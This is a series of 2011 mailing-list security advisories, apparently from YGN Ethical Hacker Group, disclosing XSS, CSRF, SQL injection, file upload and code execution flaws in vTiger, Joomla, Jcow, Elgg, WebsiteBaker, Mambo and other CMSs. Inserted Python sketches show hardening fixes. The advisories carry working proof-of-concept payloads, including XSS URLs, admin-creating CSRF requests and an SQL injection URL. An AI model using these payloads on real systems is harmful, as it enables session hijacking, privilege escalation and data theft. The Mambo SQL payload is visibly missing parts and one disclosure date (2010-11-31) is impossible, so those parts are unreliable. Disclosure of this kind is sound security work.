/index.php?module=Potentials&action=ListView&sales_stage=Prospecting&closingdate_start=2001-01-01&closingdate_end=2100-01-01&query=true&type=db%27%20onmouseover%3d%27javascript:alert%28/XSS/%29%27%20x=%27&owner=admin&viewname=10


Parameter:  view

/index.php?action=index&module=Calendar&view=week'%20onload%3d%22alert%28/XSS/)%22%20x=%22&hour=0&day=5&month=9&year=2010&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1


Parameter:  viewOption

/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=9&year=2010&viewOption=listview%27%29%22%20%20onload%3d%22alert%28/XSS/%29%22%20x=%22&subtab=event&parenttab=My&onlyforuser=1


Parameter:  viewname

/index.php?module=Calendar&action=CalendarAjax&file=ListView&ajax=changestate&viewname=10'%20onmouseover=alert(/XSS/)%20x='&errormsg=


Browser: IE 6, IE 7, FF 4 
XSS in Hidden Input Tag


Parameter:  activity_mode
Note: For this example, record id 116  needs to exist

/index.php?action=DetailView&module=Calendar&record=116&activity_mode=Task%22%20%20style=%22background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%22%20x=%22X&parenttab=My


Parameter:  display_view

/index.php?module=Dashboard&action=index&display_view=50%22%20%20style=%22background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%22%20x=%22X&pbss_edit=true

Parameter:  folderid

/index.php?module=Reports&action=SaveAndRun&record=1&folderid=17920%22%20%20style=%22background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%22%20x=%22X

Parameter:  groupId

/index.php?module=Settings&action=createnewgroup&returnaction=listgroups&parenttab=Settings&mode=edit&groupId=2%22%20%20style=%22background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%22%20x=%22X

Parameter:  mode

/index.php?module=Settings&action=createrole&roleid=H2&parenttab=Settings&mode=edit%22%20style=%22background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%22%20x=%22X

Parameter:  parent

index.php?module=Settings&action=createrole&parenttab=Settings&parent=H%22%20style=%22background-image:url('javascript:alert(0)');width:1000px;height:1000px;display:block;


Parameter:  profile_id
/index.php?module=Settings&action=profilePrivileges&parenttab=Settings&profileid=1%22%20style%3dbackground%2dimage%2durl('javascript:alert(0)')%3bwidth:1000px;height:1000px;display:block;%22%20x%3d&mode=view


Parameter:  return_action
/index.php?module=Campaigns&action=EditView&record=124&return_module=Campaigns&return_action=index%20style%3dx%3aexpression(alert(1))%20x=s&parenttab=Marketing&return_viewname=29


Parameter:  return_module

/index.php?module=Campaigns&action=EditView&record=124&return_module=Campaigns%20style%3dbackground-image%3aurl(javascript:alert(/XSS/))%20x=s&return_action=index&parenttab=Marketing&return_viewname=29


Parameter:  returnaction

/index.php?module=Settings&action=createnewgroup&returnaction=listgroups%20style%3dbackground-image%3aurl(javascript:alert(/XSS/))%20x=s&parenttab=Settings&mode=edit&groupId=2


Parameter:  roleid

/index.php?module=Settings&action=RoleDetailView&roleid=H2%20style%3dbackground-image%3aurl(javascript:alert(/XSS/))%20x=s


Parameter:  src_module
/index.php?module=Settings&action=ModuleManager&module_update=Step1&src_module=Mobile3%20style%3dbackground-image%3aurl(javascript:alert(/XSS/))%20x=s&parenttab=Setting


Parameter:  view
/index.php?action=index&module=Calendar&view=week%20style%3dxss%3aexpression(alert(1))&hour=0&day=5&month=9&year=2010&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1


6. SOLUTION

No patched version is available yet.
The vendor hasn't attempted to fix the issues though they acknowledged
the reports.


7. VENDOR

vTiger Development Team
http://www.vtiger.com/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2010-12-08: notified vendor
2011-10-04: no fixed version released yet
2011-10-04: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5BvTiger_5.2.1%5D_XSS
Wiki VtigerCRM: https://secure.wikimedia.org/wikipedia/en/wiki/Vtiger_CRM


#yehg [2011-10-04]



[Full-disclosure] Joomla! 1.7.0 | Multiple Cross Site Scripting (XSS) Vulnerabilities

2011-09-28 Thread YGN Ethical Hacker Group
 Joomla! 1.7.0 | Multiple Cross Site Scripting (XSS) Vulnerabilities



1. OVERVIEW

Joomla! 1.7.0 (stable version) is vulnerable to multiple Cross Site
Scripting issues.


2. BACKGROUND

Joomla is a free and open source content management system (CMS) for
publishing content on the World Wide Web and intranets. It comprises a
model–view–controller (MVC) Web application framework that can also be
used independently.
Joomla is written in PHP, uses object-oriented programming (OOP)
techniques and software design patterns, stores data in a MySQL
database, and includes features such as page caching, RSS feeds,
printable versions of pages, news flashes, blogs, polls, search, and
support for language internationalization.


3. VULNERABILITY DESCRIPTION

Several parameters (searchword, extension, asset, author) in Joomla!
core components are not properly sanitized upon submission to the
/index.php URL, which allows an attacker to conduct a Cross Site
Scripting attack. This may allow an attacker to create a specially
crafted URL that would execute arbitrary script code in a victim's
browser.


4. VERSION AFFECTED

1.7.0 and lower


5. PROOF-OF-CONCEPT/EXPLOIT


component: com_search, parameter: searchword (Browser: IE, Konqueror)
=


[REQUEST]
POST /joomla17_noseo/index.php HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: MSIE 8.0
Connection: close
Referer: http://localhost/joomla17_noseo
Content-Type: application/x-www-form-urlencoded
Content-Length: 456


task=search&Itemid=435&searchword=Search';onunload=function(){x=confirm(String.fromCharCode(89,111,117,39,118,101,32,103,111,116,32,97,32,109,101,115,115,97,103,101,32,102,114,111,109,32,65,100,109,105,110,105,115,116,114,97,116,111,114,33,10,68,111,32,121,111,117,32,119,97,110,116,32,116,111,32,103,111,32,116,111,32,73,110,98,111,120,63));alert(String.fromCharCode(89,111,117,39,118,101,32,103,111,116,32,88,83,83,33));};//xsss&option=com_search
[/REQUEST]




A logged-in session is required to execute the following XSSes.


Parameter: extension, Component: com_categories


http://localhost/joomla17_noseo/administrator/index.php?option=com_categories&extension=com_content%20%22onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:99;position:absolute!important;left:0;top:0;%22%20x=%22


Parameter: asset , Component: com_media


http://localhost/joomla17_noseo/administrator/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=1%22%20onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:99;position:absolute!important;left:0;top:0;%22x=%22&author=


Parameter: author, Component: com_media


http://localhost/joomla17_noseo/administrator/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=&author=1%22%20onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:99;position:absolute!important;left:0;top:0;%22x=%22





6. IMPACT

Attackers can compromise currently logged-in user/administrator
session and impersonate arbitrary user actions available under
/administrator/ functions.


7. SOLUTION

Upgrade to Joomla! 1.7.1-stable or higher.


8. VENDOR

Joomla! Developer Team
http://www.joomla.org


9. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


10. DISCLOSURE TIME-LINE

2011-07-29: notified vendor
2011-09-26: patched version, 1.7.1-stable, released
2011-09-29: vulnerability disclosed


11. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/joomla/core/%5Bjoomla_1.7.0-stable%5D_cross_site_scripting%28XSS%29
Vendor Advisory URLs:
http://developer.joomla.org/security/news/367-20110901-core-xss-vulnerability
http://developer.joomla.org/security/news/368-20110902-core-xss-vulnerability


#yehg [2011-09-29]


[Full-disclosure] Advanced Electron Forums (AEF) <= 1.0.9 Cross Site Request Forgery (CSRF) Vulnerability

2011-09-25 Thread YGN Ethical Hacker Group
Advanced Electron Forums (AEF) <= 1.0.9 Cross Site Request Forgery
(CSRF) Vulnerability



1. OVERVIEW

Advanced Electron Forums (AEF) 1.0.9 and lower versions are vulnerable
to Cross Site Request Forgery (CSRF).


2. BACKGROUND

AEF has a very simple and easy to use Administration Panel and
installing this software is a piece of cake! You can install new
themes, customize themes the way you want. The User Control Panel has
a simple yet beautiful interface where users can set their preferences
for the board.


3. VULNERABILITY DESCRIPTION

Advanced Electron Forums (AEF) 1.0.9 and lower versions contain a flaw
that allows a remote Cross-site Request Forgery (CSRF / XSRF) attack.
The flaw exists because the application does not require a
request-specific token, multiple steps or explicit confirmation for
sensitive transactions in the majority of administrator functions, such
as adding a new user or assigning administrative privileges to a user.
By using a crafted URL or form, an attacker may trick the victim into
visiting his web page and so take advantage of the trust relationship
between the authenticated victim and the application. Such an attack
could trick the victim into executing arbitrary actions in the context
of their session with the application, without further prompting or
verification.


4. VERSIONS AFFECTED

1.0.9 and lower


5. PROOF-OF-CONCEPT/EXPLOIT

The following request escalates a normal user (uid=2) to an administrator.

[REQUEST]
POST /aef/index.php?act=editprofile&uid=2 HTTP/1.1

username=tester&email=tester%40yehg.net&u_member_group=1&realname=&title=&location=&gender=1&privatetext=&icq=&yim=&msn=&aim=&www=&sig=&editprofile=Edit+Profile
[/REQUEST]


6. SOLUTION

A partial fix is available. The vendor released a single patch covering
only the EditProfile functionality shown above:
http://www.anelectron.com/downloads/index.php?act=downloadattach&atid=59


7. VENDOR

Electron Inc.
http://www.anelectron.com/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2010-12-14: notified vendor through email, website contact form submission
2011-05-17: vendor released aef 1.0.9 without the CSRF fix
2011-09-06: vendor released separate patch about the CSRF fix
2011-09-26: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[aef-1.x]_cross_site_request_forgery
CSRF Wiki: 
https://secure.wikimedia.org/wikipedia/en/wiki/Cross-site_request_forgery



#yehg [2011-09-26]



[Full-disclosure] Jcow CMS 4.x: <= 4.2, 5.x: <= 5.2 | Arbitrary Code Execution

2011-08-26 Thread YGN Ethical Hacker Group
Jcow CMS 4.x: <= 4.2, 5.x: <= 5.2 | Arbitrary Code Execution



1. OVERVIEW

Jcow CMS versions 4.x (4.2 and lower) and 5.x (5.2 and lower) are
vulnerable to Arbitrary Code Execution.


2. BACKGROUND

Jcow is a flexible Social Networking software written in PHP. It can
help you to build a social network for your interests and passions, a
member community for your existing website and a social networking
site like facebook/myspace/twitter.


3. VULNERABILITY DESCRIPTION

The attachment parameter is not validated upon submission to
/index.php. Its value is used both to build an include_once() path and
as the left-hand side of an eval()'d PHP expression, which allows an
attacker to execute arbitrary PHP code of his own.


4. VERSIONS AFFECTED

Free version:  4.x: 4.2 and lower
Commercial version:  5.x: 5.2 and lower


5. PROOF-OF-CONCEPT/EXPLOIT

http://dev.metasploit.com/redmine/attachments/1660/jcow_eval.rb

jcow 4.2.1:
file: /includes/libs/ss.inc.php
line: 167

$app = $_POST['attachment'];
if (strlen($app) && $app != 'status') {
    include_once('modules/'.$app.'/'.$app.'.php');
    $c_run = $app.'::ajax_post();';
    eval($c_run);
    exit;
}


jcow 5.2.0:
file: /includes/libs/ss.inc.php
line: 45

$Vd2a57dc1 = $_POST['attachment'];
if (strlen($Vd2a57dc1) && $Vd2a57dc1 != 'status') {
    include_once('modules/'.$Vd2a57dc1.'/'.$Vd2a57dc1.'.php');
    $Ve8200cee = $Vd2a57dc1.'::ajax_post();';
    eval($Ve8200cee);
    exit;
}
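In both listings the request value becomes a file path and then a PHP expression handed to eval(), so there is no character the attacker cannot smuggle in. The hardened shape is to stop treating the value as code at all: it may only select one entry from a fixed table of handlers. The Python sketch below, added here as an example and not Jcow's own code, shows that pattern with two made-up handlers (module names, the identifier regex and the handler bodies are assumptions) and keeps the original's 'status' no-op.

```python
import re
from typing import Callable, Dict, Optional

# Constructed stand-ins for two Jcow modules' ajax_post() entry points.
# Names and bodies are assumptions for the example.
def _photo_ajax_post() -> str:
    return "photo handler ran"

def _video_ajax_post() -> str:
    return "video handler ran"

# The only code an 'attachment' value can ever reach.
MODULE_HANDLERS: Dict[str, Callable[[], str]] = {
    "photo": _photo_ajax_post,
    "video": _video_ajax_post,
}

# Shape check a hardened version of the PHP would apply before building any
# path: a short lowercase identifier, so '..', '/', ';', quotes and spaces
# are all rejected before the filesystem or the interpreter sees them.
_MODULE_NAME = re.compile(r"^[a-z][a-z0-9_]{0,31}$")

class BadModuleName(ValueError):
    pass

def dispatch_attachment(attachment: str) -> Optional[str]:
    """Hardened replacement for include_once(...) + eval($app.'::ajax_post();').

    Returns the handler's result, None for the empty / 'status' no-op that
    the original also skips, and raises for anything else. The request can
    only pick *which* vetted handler runs; it never contributes code.
    """
    if not attachment or attachment == "status":
        return None
    if not _MODULE_NAME.match(attachment):
        raise BadModuleName(f"malformed attachment value: {attachment!r}")
    handler = MODULE_HANDLERS.get(attachment)
    if handler is None:
        raise BadModuleName(f"unknown module: {attachment!r}")
    return handler()

def is_rejected(attachment: str) -> bool:
    """Convenience wrapper for checking a value without catching the exception."""
    try:
        dispatch_attachment(attachment)
    except BadModuleName:
        return True
    return False

if __name__ == "__main__":
    for value in ["photo", "status", "../../etc/passwd", "photo;system('id')", "admin"]:
        print(f"{value!r:28} rejected={is_rejected(value)}")
```

The regex alone is not the protection; a well-formed name such as "admin" still fails because it is not in the table. Keep both checks: the regex stops the value from ever reaching a path or eval-like construct, and the table decides what is callable.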



6. SOLUTION

Free version users can upgrade to 4.3.1 or higher.
Commercial users can upgrade to 5.3 or higher.


7. VENDOR

Jcow CMS Development Team
http://www.jcow.net


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2010-06-03: notified vendor
2010-06-03: vendor replied fix would be available within 48hrs
2011-08-24: vendor released fixed versions for 4.x and 5.x,
4.3.1 for free release
5.3 for commercial release
2011-08-26: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[jcow_4.2,5.2]_arbitrary_code_execution
Jcow CMS: 
http://sourceforge.net/projects/jcow/files/jcow4/jcow.4.2.1.zip/download


#yehg [2011-08-26]


-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd



[Full-disclosure] Jcow CMS <= 4.2 | Cross Site Scripting

2011-08-26 Thread YGN Ethical Hacker Group
Jcow CMS <= 4.2 | Cross Site Scripting


1. OVERVIEW

Jcow CMS 4.2 and lower versions are vulnerable to Cross Site Scripting.


2. BACKGROUND

Jcow is a flexible Social Networking software written in PHP. It can
help you to build a social network for your interests and passions, a
member community for your existing website and a social networking
site like facebook/myspace/twitter.


3. VULNERABILITY DESCRIPTION

The parameter g is not properly sanitized upon submission to
/index.php, which allows an attacker to conduct a Cross Site Scripting
attack. This may allow an attacker to create a specially crafted URL
that would execute arbitrary script code in a victim's browser.


4. VERSIONS AFFECTED

Jcow CMS 4.2 and lower


5. PROOF-OF-CONCEPT/EXPLOIT

File: /includes/libs/member.module.php:
Line 605: <input type="hidden" name="g" value="'.$_REQUEST['g'].'" />

http://[target]/index.php?p=member/signup&email=&username=&password=&fullname=&birthyear=1991&birthmonth=01&birthday=01&gender=0&location=Myanmar++&about_me=&recaptcha_challenge_field=03AHJ_Vuvk8U6zCeSdrjB0GPDuwaRP-tPJ2G7u3Nm5LpmVSGmZs_CIP9I_C0PYZ1zYY6F42zpzGKQkxSiUhhyu-QhhwZA6oTlLNntgAgmRkDjfZpu3j4-bMeQNpOVh1afb4fZ4qwaIxHpP1wL8-8-LgkEBE5auAFmF_w&recaptcha_response_field=&g=%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E&onpost=1&agree_rules=1


6. SOLUTION

Upgrade to 4.3.1 or higher.
The commercial version 5.x.x is not vulnerable.


7. VENDOR

Jcow CMS Development Team
http://www.jcow.net


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2010-06-03: notified vendor
2010-06-03: vendor replied fix would be available within 48hrs
2011-08-24: vendor released fixed version, jcow.4.3.1.ce
2011-08-26: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[jcow_4.2]_cross_site_scripting
Jcow CMS: 
http://sourceforge.net/projects/jcow/files/jcow4/jcow.4.2.1.zip/download


#yehg [2011-08-26]




[Full-disclosure] Concrete CMS <= 5.4.1.1 Cross Site Scripting

2011-08-22 Thread YGN Ethical Hacker Group
Concrete CMS <= 5.4.1.1 Cross Site Scripting


1. OVERVIEW

Concrete CMS 5.4.1.1 and lower versions are vulnerable to Cross Site Scripting.


2. BACKGROUND

Concrete5 makes running a website easy. Go to any page in your site,
and an editing toolbar gives you all the controls you need to update
your website. No intimidating manuals, no complicated administration
interfaces - just point and click.


3. VULNERABILITY DESCRIPTION

The rcID parameter is not properly sanitized, which allows an attacker
to conduct a Cross Site Scripting attack. This may allow an attacker to
create a specially crafted URL that would execute arbitrary script
code in a victim's browser.


4. VERSIONS AFFECTED

CMS 5.4.1.1 and lower


5. PROOF-OF-CONCEPT/EXPLOIT


vulnerable parameter: rcID

<form action="http://[target]/Concrete/index.php/login/do_login/" method="post">
<input type="hidden" name="uName" value="test" />
<input type="hidden" name="uPassword" value="test" />
<input type="hidden" name="rcID" value='" style="display:block;color:red;width:;height:;z-index:;top:0;left:0;background-image:url(javascript:alert(/XSS/));width:expression(alert(/XSS/));" onmouseover="alert(/XSS/)"' />
<input type="submit" name="submit" value="Get Concrete CMS 5.4.1.1 XSS" />
</form>


6. SOLUTION

Upgrade to 5.4.2 or higher.


7. VENDOR

Concrete CMS Developers
http://www.concrete5.org/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-04-14: vulnerability reported
2011-08-04: vendor released fixed version
2011-08-23: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[concrete_5.4.1.1]_cross_site_scripting
Project Home: http://www.concrete5.org/
Vendor Release Note:
http://www.concrete5.org/documentation/background/version_history/5-4-2-release-notes/



#yehg [2011-08-23]



[Full-disclosure] Elgg <= 1.7.10 | Multiple Vulnerabilities

2011-08-18 Thread YGN Ethical Hacker Group
1. OVERVIEW

The Elgg 1.7.10 and lower versions are vulnerable to Cross Site
Scripting and SQL Injection.


2. BACKGROUND

Elgg is an award-winning social networking engine, delivering the
building blocks that enable businesses, schools, universities and
associations to create their own fully-featured social networks and
applications. Well-known Organizations with networks powered by Elgg
include: Australian Government, British Government, Federal Canadian
Government, MITRE, The World Bank, UNESCO, NASA, Stanford University,
Johns Hopkins University and more (http://elgg.org/powering.php)


3. VULNERABILITY DESCRIPTION

The internalname parameter is not properly sanitized, which allows an
attacker to conduct a Cross Site Scripting attack. This may allow an
attacker to create a specially crafted URL that would execute
arbitrary script code in a victim's browser. The tag_names parameter is
not properly sanitized either, which allows an attacker to conduct a
SQL Injection attack.


4. VERSIONS AFFECTED

Elgg 1.7.10 and lower


5. PROOF-OF-CONCEPT/EXPLOIT

- Cross Site Scripting

http://localhost/pg/embed/media?internalname=%20%22onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:99;position:absolute!important;left:0;top:0;%22%20x=%22

- SQL Injection & Info Disclosure

http://localhost/pg/search/?q=SQLin&search_type=tags&tag_names=location%27


6. SOLUTION

Upgrade to 1.7.11 or higher.


7. VENDOR

Curverider Ltd
http://www.curverider.co.uk/
http://elgg.org/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-08-01: vulnerability reported
2011-08-15: vendor released fixed version
2011-08-18: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[elgg_1710]_xss_sqlin
Project Home: http://elgg.org/
Vendor Release Note:
http://blog.elgg.org/pg/blog/brett/read/189/elgg-1711-released



#yehg [2011-08-18]



[Full-disclosure] WebsiteBaker <= 2.8.1 Cross Site Request Forgery (CSRF) Vulnerability

2011-08-13 Thread YGN Ethical Hacker Group
1. OVERVIEW

WebsiteBaker 2.8.1 and lower versions are vulnerable to Cross Site Request
Forgery (CSRF).


2. BACKGROUND

WebsiteBaker is a PHP-based Content Management System (CMS) designed with
one goal in mind: to enable its users to produce websites with ease.


3. VULNERABILITY DESCRIPTION

WebsiteBaker 2.8.1 and lower versions contain a flaw that allows a remote
Cross-site Request Forgery (CSRF / XSRF) attack. The flaw exists because the
application does not require a request-specific token, multiple steps or
explicit confirmation for sensitive transactions in the majority of
administrator functions, such as adding a new user. By using a crafted URL
or form, an attacker may trick the victim into visiting his web page and so
take advantage of the trust relationship between the authenticated victim
and the application. Such an attack could trick the victim into executing
arbitrary actions in the context of their session with the application,
without further prompting or verification.


4. VERSIONS AFFECTED

2.8.1 and lower


5. PROOF-OF-CONCEPT/EXPLOIT

The following request adds an administrator.

[REQUEST]
POST /admin/users/add.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 193

user_id=&username_fieldname=username_abcdefg&username_abcdefg=test&password=test&password2=test&display_name=test&email=tester%40yehg.net&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit=Add
[/REQUEST]
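The request above, like the AEF profile-edit request earlier on this page, succeeds because the browser attaches the admin's session cookie to any form submission, including one fired from an attacker's page. The example below, added here and not WebsiteBaker's or AEF's code, shows the standard fix: a per-session synchroniser token in the form body that a cross-site page cannot read, compared in constant time, with an Origin check as a second layer. The field names are taken from the request above; the session store, the site origin and the request dict layout are assumptions.

```python
import hashlib
import hmac
import secrets
from typing import Optional, Set, Tuple

SITE_ORIGIN = "https://cms.example"          # assumed origin of the CMS
_CSRF_KEY = secrets.token_bytes(32)           # server-side key, generated at start-up

def csrf_token(session_id: str) -> str:
    """Token bound to the session by HMAC, so nothing extra is stored server side.
    The CMS embeds it as a hidden field in every state-changing form."""
    return hmac.new(_CSRF_KEY, session_id.encode(), hashlib.sha256).hexdigest()

def csrf_token_valid(session_id: str, submitted: Optional[str]) -> bool:
    # compare_digest: no early exit on the first differing byte
    return submitted is not None and hmac.compare_digest(csrf_token(session_id), submitted)

def handle_add_user(request: dict, admin_sessions: Set[str]) -> Tuple[int, str]:
    """Stand-in for /admin/users/add.php. `request` is a constructed dict with
    'cookies' (sent automatically by the browser), 'headers' and 'form'."""
    sid = request["cookies"].get("sid")
    if sid not in admin_sessions:
        return 401, "not logged in"
    # Defence 1: synchroniser token in the body. A page on another origin can
    # make the browser send the cookie, but cannot read the token to copy it.
    if not csrf_token_valid(sid, request["form"].get("csrf_token")):
        return 403, "missing or invalid CSRF token"
    # Defence 2: when the browser sends Origin, it must be ours.
    origin = request["headers"].get("Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return 403, f"cross-site request from {origin}"
    form = request["form"]
    return 200, f"added {form['username_abcdefg']} to groups {form['groups[]']}"

def demo() -> Tuple[Tuple[int, str], Tuple[int, str]]:
    """Replay the advisory's request twice: forged from another site, then legitimately."""
    sid = "admin-session-1"
    admin_sessions = {sid}
    fields = {"user_id": "", "username_fieldname": "username_abcdefg",
              "username_abcdefg": "test", "password": "test", "password2": "test",
              "display_name": "test", "email": "tester@yehg.net", "home_folder": "",
              "groups[]": "1", "active[]": "1", "submit": "Add"}
    forged = {"cookies": {"sid": sid},
              "headers": {"Origin": "https://attacker.example"},
              "form": dict(fields)}
    legit = {"cookies": {"sid": sid},
             "headers": {"Origin": SITE_ORIGIN},
             "form": {**fields, "csrf_token": csrf_token(sid)}}
    return handle_add_user(forged, admin_sessions), handle_add_user(legit, admin_sessions)

if __name__ == "__main__":
    print(demo())
```

The token check is the one that must never be skipped: Origin is absent on some requests and is only a corroborating signal. Binding the token to the session with an HMAC means a token stolen from one session is useless in another and nothing needs to be persisted per form.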


6. SOLUTION

Upgrade to 2.8.2 or higher


7. VENDOR

WebsiteBaker Org e. V.
http://www.websitebaker2.org/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-01-26: notified vendor
2011-08-01: vendor released fix
2011-08-13: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[websitebaker-2.8.1]_cross_site_request_forgery


#yehg [2011-08-13]

[Full-disclosure] WebsiteBaker <= 2.8.1 Arbitrary File Upload Vulnerability

2011-08-13 Thread YGN Ethical Hacker Group
1. OVERVIEW

WebsiteBaker 2.8.1 and lower versions are vulnerable to Arbitrary File Upload.


2. BACKGROUND

WebsiteBaker helps you to create the website you want: A free, easy
and secure, flexible and extensible open source content management
system (CMS). Create new templates within minutes - powered by
(X)HTML, CSS and jQuery. With WebsiteBaker it's quite natural your
site is W3C-valid, SEO-friendly and accessible - there are no
limitations at all.


3. VULNERABILITY DESCRIPTION

WebsiteBaker 2.8.1 and lower versions contain a flaw in the
/admin/media/upload.php script, which fails to reject uploaded files
with the extensions .htaccess, .php4, .php5 and .phtml. This may allow
an attacker to execute arbitrary PHP code. An account on the
WebsiteBaker admin backend is required; an attacker could obtain one by
brute force, or trigger the upload through CSRF against a currently
logged-in admin user (see the cross-site file upload reference below).
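The extensions named above are the ones the upload script let through; a check that enumerates forbidden extensions is always one entry short. The example below, added here and not WebsiteBaker's code, does it the other way round: an allow-list of storable extensions (an assumed policy), applied to every dotted part of the name and to dotfiles, so .htaccess, shell.php5, shell.phtml and shell.php.jpg are all refused.

```python
import os
import re
from typing import Optional

# Extensions the upload handler may store. Allow-list, not block-list: a list
# of forbidden extensions is always one entry short (.php4, .php5, .phtml,
# .phar, .htaccess ...). The set itself is an assumed policy for the example.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}

def safe_upload_name(filename: str) -> Optional[str]:
    """Return a storage-safe file name, or None if the upload must be refused."""
    name = os.path.basename(filename.replace("\\", "/"))   # drop any client-supplied path
    if not name or name.startswith("."):                    # .htaccess and other dotfiles
        return None
    parts = name.lower().split(".")
    if len(parts) < 2 or "" in parts:                       # no extension, or 'a..b'
        return None
    stem, *exts = parts
    # Every dotted part after the stem must be allow-listed, not just the last:
    # Apache's mod_mime evaluates all of them, so shell.php.jpg can still run as PHP.
    if not all(ext in ALLOWED_EXTENSIONS for ext in exts):
        return None
    stem = re.sub(r"[^a-z0-9_-]", "_", stem)                # neutral name for storage
    return stem + "." + ".".join(exts)

if __name__ == "__main__":
    for candidate in [".htaccess", "shell.php5", "shell.phtml", "shell.php.jpg",
                      "../../index.php", "My Photo.JPG", "report.pdf"]:
        print(f"{candidate!r:22} -> {safe_upload_name(candidate)!r}")
```

A name check is only the first layer. Storing uploads outside the web root, or in a directory where script execution is switched off for the web server, closes the .htaccess case regardless of which names are accepted.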


4. VERSIONS AFFECTED

2.8.1 and lower


5. SOLUTION

Upgrade to 2.8.2 or higher


6. VENDOR

WebsiteBaker Org e. V.
http://www.websitebaker2.org/


7. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


8. DISCLOSURE TIME-LINE

2011-01-26: notified vendor
2011-08-01: vendor released fix
2011-08-13: vulnerability disclosed


9. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[websitebaker-2.8.1]_arbitrary_file_upload
http://www.gnucitizen.org/blog/cross-site-file-upload-attacks/


#yehg [2011-08-13]



[Full-disclosure] Mambo CMS 4.6.x (4.6.5) | SQL Injection

2011-08-11 Thread YGN Ethical Hacker Group
Mambo CMS 4.6.x (4.6.5) | SQL Injection


1. OVERVIEW

Mambo CMS 4.6.5 and lower versions are vulnerable to SQL Injection.


2. BACKGROUND

Mambo is a full-featured, award-winning content management system that can
be used for everything from simple websites to complex corporate
applications. It is used all over the world to power government portals,
corporate intranets and extranets, ecommerce sites, nonprofit outreach,
schools, church, and community sites. Mambo's power in simplicity also
makes it the CMS of choice for many small businesses and personal sites.


3. VULNERABILITY DESCRIPTION

The zorder parameter is not properly sanitized upon submission to the
administrator/index2.php URL (the administrator back end), which allows
an attacker to conduct a SQL Injection attack. This could allow an
attacker to inject or manipulate SQL queries in the back-end database,
allowing for the manipulation or disclosure of arbitrary data. The
proof of concept below is an error-based injection: the duplicate key
produced by GROUP BY over FLOOR(RAND(0)*2) makes MySQL report the
CONCAT()'d value in its error message.


4. VERSIONS AFFECTED

Tested on Mambo CMS 4.6.5


5. PROOF-OF-CONCEPT/EXPLOIT

http://localhost/mambo/administrator/index2.php?limit=10&order[]=11&boxchecked=0&toggle=on&search=sqli&task=&limitstart=0&cid[]=on&zorder=-1 OR (SELECT  FROM(SELECT COUNT(*),CONCAT(CHAR(58,98,112,101,58),(SELECT (CASE WHEN (=) THEN 1 ELSE 0 END)),CHAR(58,110,100,107,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&filter_authorid=62&hidemainmenu=0&option=com_typedcontent


6. SOLUTION

The vendor appears to have discontinued development. It is recommended to
migrate to a CMS in active development.


7. VENDOR

Mambo CMS Development Team
http://mambo-developer.org


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2010-11-31: notified vendor through bug tracker
2011-08-12: no patched version released up to date
2011-08-12: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[mambo4.6_x]_sql_injection
Mambo CMS:
http://mambo-code.org/gf/download/frsrelease/388/791/MamboV4.6.5.zip


#yehg [2011-08-12]

